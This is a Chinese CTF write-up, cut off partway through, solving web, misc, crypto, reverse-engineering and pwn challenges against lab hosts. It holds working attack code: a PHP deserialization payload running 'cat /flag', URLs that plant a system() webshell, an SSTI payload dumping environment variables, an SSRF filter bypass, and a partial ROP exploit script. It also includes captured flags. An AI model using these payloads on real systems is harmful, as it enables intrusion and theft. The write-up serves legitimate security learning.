# 前言
本次混了一个第 7
# web
# web1
利用链：`H::__destruct()` → `H::welcome()` → 字符串拼接 `"welcome~ ".$this->username` 触发 `Hacker::__toString()` → `system("cat /flag")`。只需要把 `H::$username` 设为一个 `Hacker` 对象，反序列化后对象销毁时即可触发。
exp:
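<?php
// Payload generator for web1.
//
// Gadget chain (all classes come from the target's source and are mirrored
// below so serialize() produces the right class/property names):
//   H::__destruct() -> H::welcome() -> "welcome~ ".$this->username
//   -> Hacker::__toString() -> system("cat /flag")
//
// serialize() only looks at class and property names; the method bodies are
// never run by this generator.  Hacker::__toString() is therefore left as an
// inert stub here: copying the target's body verbatim would make *this*
// script execute `cat /flag` when $a is destroyed at the end of the run.
error_reporting(0);

class Hacker
{
    // Private properties serialize as "\0Hacker\0exp" / "\0Hacker\0cmd".  The
    // NUL bytes are why the payload is url-encoded before printing (see below).
    private $exp;
    private $cmd;

    public function __toString()
    {
        // target's body: call_user_func('system', "cat /flag");
        return '';
    }
}

// The remaining classes are the other gadgets present in the challenge source.
// They are not used by this chain but are kept so the file documents the full
// attack surface (and so the payload can be extended if needed).
class A
{
    public $hacker;

    public function __toString()
    {
        echo $this->hacker->name;
        return "";
    }
}

class C
{
    public $finish;

    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}

class E
{
    public $hacker;

    public function __invoke($parms1)
    {
        echo $parms1;
        $this->hacker->welcome();
    }
}

class H
{
    public $username;

    public function __destruct()
    {
        $this->welcome();
    }

    public function welcome()
    {
        // string concatenation is what triggers __toString() on $username
        echo "welcome~ " . $this->username;
    }
}

class K
{
    public $func;

    public function __call($method, $args)
    {
        call_user_func($this->func, 'welcome');
    }
}

class R
{
    private $method = "phpinfo";
    private $args;

    public function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method, $this->args);
            }
        }
    }
}

$a = new H();
$a->username = new Hacker();
// url-encode so the NUL bytes in the private property names survive being
// pasted into a query string / form field.
echo urlencode(serialize($a));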
# web2
利用 `glob://` 伪协议配合通配符 `*` 逐字符爆破后门文件名：每次把当前前缀加一个候选字符再拼上 `*`，响应中出现 yes 说明服务器上存在以该前缀开头的文件。
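import string

URL = "http://172.10.0.5/"
PREFIX = "backdoor_"
# digits, the whole a-z alphabet and '.', so a hex file name plus its ".php"
# suffix is always reachable (a charset missing letters silently stalls the search)
CHARSET = string.digits + string.ascii_lowercase + "."


def glob_probe(candidate):
    """POST filename=glob://<candidate>* and report whether the page answered 'yes'.

    The glob:// wrapper is evaluated on the server's filesystem, so a 'yes'
    means some file there starts with `candidate`.
    """
    import requests  # local import keeps the pure search helper testable without it

    data = {"filename": "glob://" + candidate + "*"}
    return "yes" in requests.post(URL, data=data).text


def brute_name(probe, prefix=PREFIX, charset=CHARSET, max_len=80):
    """Extend `prefix` one character at a time using `probe(candidate) -> bool`.

    Each accepted character is printed as it is found.  The search stops when
    no character of `charset` extends the name any further (which is also how
    the end of the real file name is detected) or when `max_len` is reached,
    so it cannot spin forever once the name is complete.
    """
    name = prefix
    while len(name) < max_len:
        for ch in charset:
            if probe(name + ch):
                name += ch
                print(name)
                break
        else:
            break
    return name


if __name__ == "__main__":
    print(brute_name(glob_probe))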
`title[]`/`data[]` 以数组形式传参绕过过滤，把 PHP 代码写入 shell.php 后执行命令：
http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22dir%20/%22);
获取 flag
http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22cat%20/flag%22);
# Web-Escape
原题:Archived Challenges - ImaginaryCTF 和这个 Helpful - BONUS,是一样的直接用官网上的 payload 打了
http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}&password=1
flag{d467150b-6e0b-4a9a-96c1-2148c6edcd5f}
# Web-Tera
题目打开
很明确的一个模版注入的题目
# WEB-HTTP
这里打开页面是一个游戏,没什么东西,先扫描一下目录
这里有一个 /swagger-resources 目录这里去找了一下文章
这里找了一下相关文章 Swagger 未授权访问漏洞 - 腾讯云开发者社区 - 腾讯云 (tencent.com)
这里是存在 Swagger 未授权访问漏洞,检索到了一个 /swagger-ui/index.html 目录,这里访问
这里点击 proxy
这里点击 try it out
这里多了一个 url 参数可控
这里换种访问方式
使用 file 协议访问时显示协议无效；按 p 牛知识星球里提到的方法，在前面加 `url:` 前缀（`java.net.URL` 解析时会忽略这个前缀，从而绕过对协议名的检查）。
然后页面提示只能展示 html，在 URL 末尾加 `#` 让后缀检查通过即可。
# MISC
# Misc - 我的壁纸
拿到附件用 foremost 分离出三个文件
文本文件
使用 snow 解密
密码:snowday
拿到了一部分
音频文件是无线电,题目上也给了提示使用 Robot 36
然后扫描二维码
中间一段,图片使用 steghide 解
密码是:7hR@1nB0w$
拼接一下即可
# Crypto
# leak rsa
用深搜恢复 p、q 的高位：从代码看 gift 是 p 与 q 高位逐位异或的结果（某位为 0 则两者该位相同，为 1 则不同），同时用 N 的上下界剪枝。但最终剩下了多个候选，说明仅靠这 262 位还不能唯一确定，需要继续逐个尝试。
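N = 73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
C = 71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
gift = 2223117424030234543005449667053988296724455736030907136592525175314696509716321


def search_pq(N, gift, nbits=262, plen=512):
    """Breadth-first recovery of the top `nbits` bits of the two factors of N.

    `gift` is used as the bitwise XOR of the factors' high bits: where a bit of
    ('0' + bin(gift)) is '0' the factors share that bit, where it is '1' they
    differ.  A partial prefix pair survives only while N still lies between the
    product of the smallest and the product of the largest `plen`-bit values
    that extend the two prefixes.  Returns the surviving (p_prefix, q_prefix)
    pairs as bit strings; several may remain, and each pair also appears with
    p and q swapped.
    """
    bits = '0' + bin(gift)[2:]
    same = [('0', '0'), ('1', '1')]
    differ = [('0', '1'), ('1', '0')]
    pairs = [('', '')]
    for bit in bits[:nbits]:
        choices = same if bit == '0' else differ
        survivors = []
        for p_pre, q_pre in pairs:
            for a, b in choices:
                p_new, q_new = p_pre + a, q_pre + b
                lo = int(p_new.ljust(plen, '0'), 2) * int(q_new.ljust(plen, '0'), 2)
                hi = int(p_new.ljust(plen, '1'), 2) * int(q_new.ljust(plen, '1'), 2)
                if lo <= N <= hi:
                    survivors.append((p_new, q_new))
        pairs = survivors
    return pairs


PQ = search_pq(N, gift)
print(PQ)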
接着对下一位进行爆破：把每个候选前缀分别补上一位 0 和 1，共得到 40 个 263 位的候选高位。
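# Extend every surviving 262-bit prefix pair (output of the DFS above) by one
# more bit in both directions.  Each pair contributes 4 values (p+'0', p+'1',
# q+'0', q+'1'), giving 40 candidate 263-bit high parts for Coppersmith.
# (The previous version pulled in Crypto.Util.number without using it.)
p = [('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010')]

# order: for each pair -> p then q -> appended '0' then '1'
D = [int(prefix + extra, 2) for pair in p for prefix in pair for extra in '01']
print(D)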
对每个候选高位用 Coppersmith（sage 的 `small_roots`）尝试恢复剩余的低 249 位：
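n = 73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
# 263-bit candidate high parts of a factor (each value is listed twice: once
# from the p side and once from the q side of the DFS output)
candidates = [7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837]
pbits = 512


def factor_from_prefix(n, prefix, pbits=512, beta=0.5, epsilon=0.01):
    """Try to complete the known high bits `prefix` of a `pbits`-bit factor of n.

    The unknown low part x of the factor is a small root of f(x) = x + (prefix
    << kbits) modulo a divisor of n of size >= n^beta, which is what
    small_roots() finds.  Returns the full factor when a returned root really
    divides n, otherwise None.
    """
    prefix = Integer(prefix)
    kbits = pbits - prefix.nbits()
    high = prefix << kbits
    PR.<x> = PolynomialRing(Zmod(n))
    f = x + high
    for r in f.small_roots(X=2^kbits, beta=beta, epsilon=epsilon):
        cand = high + Integer(r)
        if n % cand == 0:
            return cand
    return None


# dict.fromkeys() drops the duplicated entries while keeping the original order,
# halving the number of lattice reductions
for cand in dict.fromkeys(candidates):
    print(Integer(cand).nbits())
    factor = factor_from_prefix(n, cand, pbits)
    if factor is not None:
        print("p =", factor)
        break
else:
    print("no candidate completed to a factor of n")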
只要某个候选的 `small_roots` 返回了非空的根即可：候选高位左移后加上该根就是 p（或 q），再用 q = n // p 正常解 RSA。
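# Complete the winning Coppersmith candidate and decrypt.
n = 73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
c = 71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
e = 65537

# 263-bit high part of p: the DFS prefix plus the one brute-forced extra bit
p4 = 11975359106462250866004610445325637689150797603362754225369957476901819007810757
kbits = 512 - p4.bit_length()
# low kbits (249) bits of p, as returned by small_roots() for this candidate
root = 611414793025621783063521676721076724031914595699228956891999095186369770019

p = (p4 << kbits) + root
assert n % p == 0, "candidate high part + root is not a factor of n"
q = n // p
# stdlib modular inverse (Python >= 3.8); the earlier version relied on
# Crypto.Util.number.inverse without importing it
d = pow(e, -1, (p - 1) * (q - 1))
m = pow(c, d, n)
flag = m.to_bytes((m.bit_length() + 7) // 8, "big")  # same as long_to_bytes()
print(flag)
# b'flag{6eb67115-38b1-4e75-b3fc-de3a9697e565}'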
# SecretShare
前半部分是 mt19937：输出里已知的 1024 位随机数拆成 32 位字后超过 624 个，可以直接恢复内部状态并预测下一个随机数。后半部分是 Shamir 秘密共享：把 20 个已知点加上预测出的第 21 个点放进 21×21 的范德蒙矩阵求解，常数项就是 p，然后正常解 RSA 即可。
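import re

# Challenge-specific values that are not part of this listing.  Fill them in
# from the task: the prime p of the sharing field, the RSA modulus N and
# ciphertext C, and `leak` = the share value that belongs to the predicted
# 21st x.
p = None
N = None
C = None
leak = None
OUTPUT_FILE = "output.txt"


def extract_numbers(string):
    """Return every run of decimal digits in `string` (as strings), in order."""
    return re.findall(r'\d+', string)


def get_predict(X):
    """Recover the MT19937 state from the 1024-bit outputs in X and predict the next one.

    Each X[i] is split into its 32 little-endian 32-bit words, which is the
    order in which CPython's getrandbits() assembles generator outputs (low
    word first); the last 624 words are fed to randcrack.
    """
    from randcrack import RandCrack

    words = []
    for i in range(20):
        for j in range(1024 // 32):
            words.append((X[i] >> (32 * j)) % 2 ** 32)
    words = words[-624:]
    rc = RandCrack()
    for w in words:
        rc.submit(w)
    return rc.predict_getrandbits(1024)


def recover_secret(X, R, p):
    """Solve sum_i a_i * X[j]^i = R[j] over GF(p) for the 21 coefficients and return a_0."""
    from sage.all import matrix, Zmod, ZZ

    XX = matrix(Zmod(p), 21, 21)
    for i in range(21):
        for j in range(21):
            XX[i, j] = pow(X[j], i, p)
    A = XX.solve_left(matrix(Zmod(p), R))
    return ZZ(A.list()[0])


def main():
    from Crypto.Util.number import long_to_bytes

    if None in (p, N, C, leak):
        raise SystemExit("fill in p, N, C and leak from the challenge first")
    # text mode: re.findall with a str pattern rejects bytes input
    with open(OUTPUT_FILE, "r") as output:
        f = output.read()
    data = extract_numbers(f)
    X, R = [], []
    for i in range(0, len(data), 2):
        X.append(int(data[i]))
        R.append(int(data[i + 1]))
    X.append(get_predict(X))
    R.append(leak)
    new_p = recover_secret(X, R, p)
    new_q = N // new_p
    d = pow(65537, -1, (new_p - 1) * (new_q - 1))
    print(long_to_bytes(pow(C, d, N)))


if __name__ == "__main__":
    main()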
# re
# Re - 安全编程
puzzle solver 扫一下,发现直接异或 0x80 就能出,当成 misc,属实非预期了。
# Re-babyre
先跑随机数
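#include <cstdio>
#include <cstdlib>

// Dumps the rand() stream the target consumes after srand(0xdeadc0de).
//
// The table is only reproducible with the same C runtime as the target: the
// challenge binary is a Windows PE, so build this with MSVC.  The values it
// prints are all below 0x8000, matching MSVC's 15-bit rand(); glibc's rand()
// would yield a different sequence.
int main() {
    constexpr unsigned kSeed = 0xdeadc0de;
    // 32 rounds * 7 values; the decryption script only consumes the first 192 (32 * 6)
    constexpr int kCount = 32 * 7;

    std::srand(kSeed);
    for (int i = 0; i < kCount; ++i) {
        std::printf("0x%x,", std::rand());
    }
    return 0;
}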
本来想用 z3 解决，但是没解出来：下面这版模型把 8 位的 BitVec 直接左移 24 位去拼 32 位字（位会被截掉），`>>` 在 z3 里又是算术右移，而且 `rd` 还是空表，所以约束本身就是错的。修正后的写法见下（按 Concat/LShR 建模，目标字从密文字节按小端计算）。
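from z3 import *

MASK = 0xffffffff


def mix_term(w, add_k, xor_k):
    """f(w) = (add_k + (w >>> 7)) + (xor_k ^ (((w >>> 15) ^ (w << 10)) | 3)) on 32-bit words.

    LShR is used on purpose: z3's `>>` on a BitVec is an *arithmetic* shift,
    while the integer decryption script (non-negative Python ints) and the
    binary use logical shifts.
    """
    return (add_k + LShR(w, 7)) + (xor_k ^ ((LShR(w, 15) ^ (w << 10)) | 3))


def solve_block(rd, target, rounds=32):
    """Recover the 12 input bytes of one block.

    rd     -- the rand() table (at least 6 * rounds entries are used)
    target -- the 12 ciphertext bytes of this block
    Returns the plaintext bytes, or None if the model is unsat.
    """
    if len(rd) < 6 * rounds:
        raise ValueError("need %d rand() values, got %d" % (6 * rounds, len(rd)))
    if len(target) != 12:
        raise ValueError("a block is 12 bytes")

    sym = [BitVec("c%d" % i, 8) for i in range(12)]
    s = list(sym)
    v5 = v6 = v7 = None
    for k in range(rounds):
        # per-byte affine map; 8-bit BitVec arithmetic already wraps like (23*x+66)&0xff
        s = [23 * b + 66 for b in s]
        # little-endian words.  Concat widens to 32 bits; shifting the 8-bit
        # values by 24/16/8 would be evaluated in 8 bits and lose everything.
        v5, v6, v7 = [Concat(s[4 * x + 3], s[4 * x + 2], s[4 * x + 1], s[4 * x]) for x in range(3)]
        keys = [BitVecVal(rd[6 * k + t], 32) for t in range(6)]
        v5 = v5 + mix_term(v6, keys[0], keys[1])
        v6 = v6 + mix_term(v7, keys[2], keys[3])
        v7 = v7 + mix_term(v5, keys[4], keys[5])  # uses the already-updated v5
        s = [Extract(8 * i + 7, 8 * i, w) for w in (v5, v6, v7) for i in range(4)]

    # Targets are derived from the bytes so the byte order cannot be mistyped:
    # e.g. 48 4D 3B A0 is 0xA03B4D48 little-endian (an earlier attempt hard-coded
    # 0xA0484D3B, which does not match those bytes).
    want = [int.from_bytes(bytes(target[4 * x:4 * x + 4]), "little") for x in range(3)]
    solver = Solver()
    for w, t in zip((v5, v6, v7), want):
        solver.add(w == t)
    if solver.check() != sat:
        return None
    m = solver.model()
    return bytes(m.eval(b, model_completion=True).as_long() for b in sym)


if __name__ == "__main__":
    # paste the values printed by the srand(0xdeadc0de) generator here
    # (224 values; only the first 192 are consumed)
    rd = []
    c = [0x48, 0x4d, 0x3b, 0xa0, 0x27, 0x31, 0x28, 0x54, 0x6d, 0xf1, 0x21, 0x35, 0x18, 0x73, 0x6a, 0x4c, 0x71, 0x3b, 0xbd, 0x98, 0xb6, 0x5a, 0x77, 0x2d, 0xb, 0x2b, 0xcb, 0x9b, 0xe4, 0x8a, 0x4c, 0xa9, 0x5c, 0x4f, 0x1b, 0xf1, 0x98, 0x3d, 0x30, 0x59, 0x3f, 0x14, 0xfc, 0x7a, 0xf4, 0x64, 0x2, 0x2b]
    if len(rd) < 192:
        raise SystemExit("fill rd with the rand() table first")
    out = b""
    for ip in range(0, len(c), 12):
        block = solve_block(rd, c[ip:ip + 12])
        print(block)
        if block is None:
            break
        out += block
    print(out)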
后来改为手写解密算法，大小端的处理比较绕。三个字的混合部分按逆序减回去，最后一步逐字节的仿射变换 `encrypt1`（23*x+66 mod 256）的逆没有推公式，直接用 256 项查表（爆破）完成。
# rand() stream of the target after srand(0xdeadc0de) (see the generator above)
rand = [0x4df2,0x7125,0x3739,0xde6,0x2755,0x7a13,0x7e6a,0x2ea4,0xd66,0x6d41,0x39ff,0x2cc9,0x2f8f,0x233d,0x6bde,0x1fef,0x2f12,0x4018,0x5065,0x194e,0x4555,0x106b,0x575c,0x8e0,0x247c,0x3798,0x2927,0x7dc4,0x463d,0x1352,0xc40,0x45e1,0x1cf0,0x7860,0x3ee5,0x30cb,0x5ae6,0x2c9d,0x190e,0x79ea,0x43fc,0x4244,0xaa2,0x1dd9,0x3d70,0x386a,0x49ea,0x1f0c,0xff3,0x4cc,0x4646,0x7db6,0xfff,0x6acb,0x331f,0x66e9,0x206a,0x43b5,0x3f1c,0x5eff,0x433c,0x1c46,0x4b99,0x6b3a,0x2cbe,0x4b6f,0x3855,0x7ea7,0xcd3,0x6655,0x176a,0x2e48,0x28b,0x359d,0x5d83,0x7071,0x6df6,0xfe7,0x6249,0x6b73,0x1436,0x3d98,0x451e,0x1778,0x49d8,0x49dd,0xa0e,0x37ae,0x1765,0x64ed,0x302,0x6ea8,0xc33,0x3b8e,0x5937,0x7201,0x3381,0x67da,0x4aef,0x2142,0x5fc3,0x5f43,0x7167,0x405,0x403b,0x1d5,0x2308,0x735b,0x74c9,0x2ebb,0x45e1,0x726c,0x1404,0x205,0x2655,0x7a5d,0x5789,0x1fa8,0x2611,0x3d77,0x6294,0x2fc6,0x5742,0x2585,0x56cd,0x7030,0x5804,0x117d,0x2b64,0x7f2a,0x21d,0x1663,0x7a5f,0x436e,0x42eb,0x476b,0x3833,0x1573,0x2f9b,0x495e,0x992,0xdee,0x299c,0x353e,0x2b85,0x1d9a,0x2753,0xe2d,0x21ba,0x5234,0x7511,0x4e8b,0x1f1f,0x6cca,0x242,0x505f,0x5cb0,0x2d36,0xee7,0x14f8,0x528c,0x76e6,0x4d46,0x2fd4,0x74f,0x32de,0x4bdf,0x58c0,0x699c,0x12ff,0x3ba3,0x6941,0x67f9,0x1a89,0x6661,0x4933,0x3ae0,0xfdf,0x6981,0xeb0,0x1512,0x3b8a,0x8f4,0x5533,0x2e2f,0x1881,0x2e6b,0xffd,0x5b84,0x59a7,0x68c7,0x5bb8,0x2b24,0x6896,0x7fd1,0x135b,0x353a,0x419b,0x702c,0x2c4d,0x179d,0x5101,0x6388,0x1dcd,0x4fa5,0x3593,0x7917,0x5791,0x663e,0xc5c,0x7245,0xbad,0x223a,0x29b1,0x17a4,0x4fb7,0x34ec,0x6372,0x6a25,0x5929,0x14f2,0x508c,0x748e,0x5906]

MASK = 0xffffffff


def encrypt1(c):
    """Per-byte affine map applied by the target at the start of every round."""
    return (23 * (c) + 66) & 0xff


# inverse of encrypt1 as a lookup table; 23 is odd, so the map is a bijection on 0..255
inv_affine = [0] * 256
for value in range(256):
    inv_affine[encrypt1(value)] = value


def mix_term(w, add_key, xor_key):
    """Contribution of word w to its partner: (add_key + (w >> 7)) + (xor_key ^ (((w >> 15) ^ (w << 10)) | 3)).

    Bits above 32 produced by `w << 10` are harmless: the caller reduces the
    result mod 2**32 after the subtraction.
    """
    return (add_key + (w >> 7)) + (xor_key ^ (((w >> 15) ^ (w << 10)) | 3))


# ciphertext, 4 blocks of 12 bytes; decrypted in place below
c = [0x48, 0x4d, 0x3b, 0xa0, 0x27, 0x31, 0x28, 0x54, 0x6d, 0xf1, 0x21, 0x35, 0x18, 0x73, 0x6a, 0x4c, 0x71, 0x3b, 0xbd, 0x98, 0xb6, 0x5a, 0x77, 0x2d, 0xb, 0x2b, 0xcb, 0x9b, 0xe4, 0x8a, 0x4c, 0xa9, 0x5c, 0x4f, 0x1b, 0xf1, 0x98, 0x3d, 0x30, 0x59, 0x3f, 0x14, 0xfc, 0x7a, 0xf4, 0x64, 0x2, 0x2b]

for ip in range(0, len(c), 12):
    # every block consumes rand[0..191]; we walk the table backwards, two keys per step
    key_idx = 191
    for _ in range(32):
        words = [int.from_bytes(bytes(c[ip + 4 * x:ip + 4 * x + 4]), "little") for x in range(3)]
        # Undo the three word updates in reverse order.  The forward round did
        #   v5 += f(v6); v6 += f(v7); v7 += f(v5')  (v5' already updated),
        # so each step here reads the word the previous step just restored.
        for target, source in ((2, 0), (1, 2), (0, 1)):
            words[target] = (words[target] - mix_term(words[source], rand[key_idx - 1], rand[key_idx])) & MASK
            key_idx -= 2
        # back to little-endian bytes, then undo the per-byte affine map
        for x in range(3):
            for offset, byte in enumerate(words[x].to_bytes(4, "little")):
                c[ip + 4 * x + offset] = inv_affine[byte]

print("".join(map(chr, c)))
# Re-BadRe
DIE 能扫出来是 64 位程序,但是跑不起来,猜测是 PE 结构有问题,上 CFF Explorer
发现这个 ATOM 段有问题 Raw Address 错误。
这边是对这个 Section 解密
跑起来 dump
发现实际上解密出来了一个 PE 文件,可以看到 PE 头了,然后 dump 下这个节,下面的应该是 PE 重载的过程
载入后发现是个 rc4
解出来就行 flag
# pwn
# PWN-silent
# 程序分析
程序存在直接的栈溢出，没有开启 canary，沙箱禁用了 execve。难点在于可调用的函数太少，需要不断布局控制执行流。起初想找 gadget 直接改写而不爆破，但没有找到。最终思路：利用 read 部分覆盖 bss 段中残留的 libc 地址的低 3 字节，使其指向 libc 中的 syscall gadget（页内偏移固定，其余位需要爆破）；再利用 read 的返回值控制 rax=1 调用 write 泄露 libc；最后打一个 orw 读 flag。
# exp
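from pwn import *

# libc-2.27 build used by the challenge.  Every libc offset below (pop rdx,
# open, write, read, the 3 low bytes of the syscall gadget) was taken from this
# exact build and must be recomputed for any other libc.
libc = ELF("/home/clown/Desktop/libc-2.27.so")
elf = ELF("./silent")

# gadgets / data addresses in the (non-PIE) binary
ret = 0x4008FD
pop_rdi = 0x400963
pop_rsi_r15 = 0x400961      # pop rsi ; pop r15 ; ret  (hence the p64(0) filler after each rsi)
bss1 = 0x601010
bss2 = 0x6010A0
leave = 0x4008FC
pop_rsp_3xx = 0x40095D      # pop rsp followed by three more pops, hence the "- 0x18" on every pivot target
null = 0x602088
bss_libc = 0x601030 - 0x28  # chain is read here; its last 3 bytes land on the leftover libc pointer at 0x601030


def start(p):
    """Run one attempt against connection p.

    Returns True once the open/read/write chain has been sent and the session
    handed to the user, False when this attempt failed (the partial overwrite
    below guesses ASLR bits, so the caller simply retries on a new connection).
    """
    # Stage 1: stack overflow.  rbp -> bss2-0x18, read the next chain to
    # bss2-0x10 and `leave` pivots the stack into it.
    payload = b'a' * 0x40 + p64(bss2 - 0x18) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss2 - 0x10) + p64(0) + p64(elf.plt['read']) + p64(leave)
    p.send(payload)
    # the short sleeps keep consecutive sends from being swallowed by a single read()
    sleep(0.1)

    # Chain living at bss2-0x10: read into bss_libc, pivot, read the stage-2
    # trampoline to 0x601038, read once more into `null`, then pivot to the
    # write-setup chain at bss_libc.
    payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss_libc) + p64(0) + p64(elf.plt['read'])
    payload += p64(pop_rsp_3xx) + p64(0x6010D0 - 0x18)
    payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601038) + p64(0) + p64(elf.plt['read'])
    payload += p64(pop_rsi_r15) + p64(null) + p64(0) + p64(elf.plt['read'])
    payload += p64(pop_rsp_3xx) + p64(bss_libc - 0x18)
    p.send(payload)
    sleep(0.1)

    # Read into bss_libc: rdi=1, rsi=alarm@got, and the trailing 3 bytes
    # partially overwrite the leftover libc pointer at 0x601030 with the low
    # bytes of the syscall gadget.  The low 12 bits are fixed by page
    # alignment; the bits above are an ASLR guess, which is what the retry
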